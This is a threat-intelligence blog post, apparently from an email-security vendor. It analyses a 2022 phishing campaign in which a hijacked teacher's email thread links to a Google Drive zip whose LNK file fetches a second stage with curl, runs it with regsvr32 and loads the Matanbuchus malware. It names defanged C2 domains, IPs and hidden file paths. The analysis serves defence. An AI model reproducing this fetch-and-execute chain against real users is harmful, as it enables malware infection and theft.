Back to All Research

Google Drive as a Distribution Method for Matanbuchus Malware

In this attack, threat actors impersonate a teacher to deliver Matanbuchus malware-as-a-service (MaaS) using a Google Drive link.
August 18, 2022

Initially launched in February 2021, Matanbuchus is a malware-as-a-service (MaaS) available on Russian-speaking cybercrime forums.

Similar to other malware loaders like BazarLoader, Matanbuchus is a malicious software that is designed to download and run second-stage executable files from command and control (C&C or C2) servers without detection. According to Matanbuchus’ author, the malware has the ability to launch a .exe or .dll file in memory, run custom PowerShell commands, and more.

Abnormal recently observed a new approach to delivering the malware loader. Combining more convincing social engineering tactics with legitimate infrastructure—in this case Google Drive—threat actors are able to launch an attack that is significantly more difficult to detect.

Hijacking an Email Thread Using a Compromised Account

In June 2022, Abnormal was able to detect an email purportedly sent from a teacher from a well-known district school. Using a hijacked thread, the attackers were able to leverage the teacher’s identity and the real school at which she worked as a way to avoid detection. Additionally, the email account used for the delivery of this mail comes from a legitimate domain that is presumed to have been compromised.

The attackers took advantage of multiple elements to not only create an appearance of credibility to fool targets but also obfuscate the malware to bypass email security. The diagram below shows the flow of the attack detected by Abnormal up to the point of downloading the Matanbuchus malware, which would eventually download another family of malware like Cobalt Strike.

Matanbuchus 1 Attack Flow

Matanbuchus malware attack flow

Threat Analysis

The impersonated party in this attack is a teacher who is employed by the district school and is also a member of a group that supports the school community. The attack begins with the hijacked thread from the teacher inviting recipients to participate in the next community meeting. The message includes a Google Drive URL, which the threat actor claims is a link to a document related to the event.

Matanbuchus 2 Phishing Email

Phishing email

This Google Drive link downloads a zip file with a LNK file inside.

Matanbuchus 3 Google Drive Zip File

Zip file downloaded from Google Drive link

Within its properties, the LNK file has the command-line argument that it needs to initiate the second stage.

Matanbuchus 4 Lnk Properties

LNK properties

Only a small snippet of the target path is visible; however, the command-line argument extends beyond what the victim can see.

Matanbuchus 5 Argument in Lnk Target Property

Complete argument in the LNK target property

The first step in this argument is to create the hP folder and then check the internet connection pinging Mh4m[.]com and 4umz[.]com. The malicious file uses clean URLs so as not to be detected as suspicious network traffic.

Matanbuchus 6 Lnk Checking Internet Connection

LNK file checking the internet connection

The second step in the argument is to download a second file, using curl, from https://re9cred[.]com/N9tIgZB/Wq[.]png. The file uVbU.UEMX.pafB is saved in the hidden directory ..\AppData\Roaming\hP, which makes it imperceptible to the victim.

Matanbuchus 7 Second File Downloaded Using Curl

Second file downloaded via curl

The second file is running with regsvr32. The malicious file has different domains to reach out to download a third file and increase the download success.

Matanbuchus 8 Different C2 Domains

Different C2 available to download Matanbuchus

The file establishes a connection with the C2 telemetryreporting[.]com and IP 31[.]41[.]244[.]234 and downloads the malware Matanbuchus. All of the network traffic is using base64 encoding as an anti-detection technique.

Matanbuchus 9 Wireshark Downloading Matanbuchus

Wireshark packages downloading malware encoded in base64

Matanbuchus malware is saved in the hidden directory ..\AppData\Local\9e0a with the name x86.nls.

Matanbuchus 10 Hidden Directory in Local File

Malware saved in the local folder as x86.nls

After downloading the malware, the connection with the C2 31[.]41[.]244[.]230 is still sending the same information from the host to maintain the established connection.

Matanbuchus 11 C2 Connection Established

Connection established with the C2

As we saw before, the traffic is encoded in base64.

Matanbuchus 12 HTTP POST Request Package

HTTP POST request package from the C2 network traffic

In this case, after decoding the base64 we can see different arguments, potentially related to the victim's configuration system.

Matanbuchus 13 Base64 Decoded C2 Network Traffic

Base64 decoded C2 network traffic

Blocking Advanced Malware Attacks

The threat actors used a powerful combination of tactics to launch this attack: impersonating an actual teacher at a well-known school, exploiting a legitimate domain, leveraging Google Drive as the infrastructure, and using a sophisticated malware loader. Because the foundation of the attack is legitimate elements, it enables the threat actors to more easily fool the target and execute the multi-stage attack.

In addition, the technique of decoding malicious code in memory makes it more difficult for security systems to detect the malware. A traditional email security platform would be incapable of stopping an attack with this level of complexity. Effectively blocking these kinds of attacks requires a solution designed specifically to detect these indicators of compromise.

Indicators of Compromise (IOCs)


Zip file


LNK file


Malicious dll















B 08 22 22 AI Site Matanbuchus Malware Blog

Get the Latest from Abnormal Intelligence

Subscribe to our monthly newsletter to receive the latest insights from our team directly in your inbox.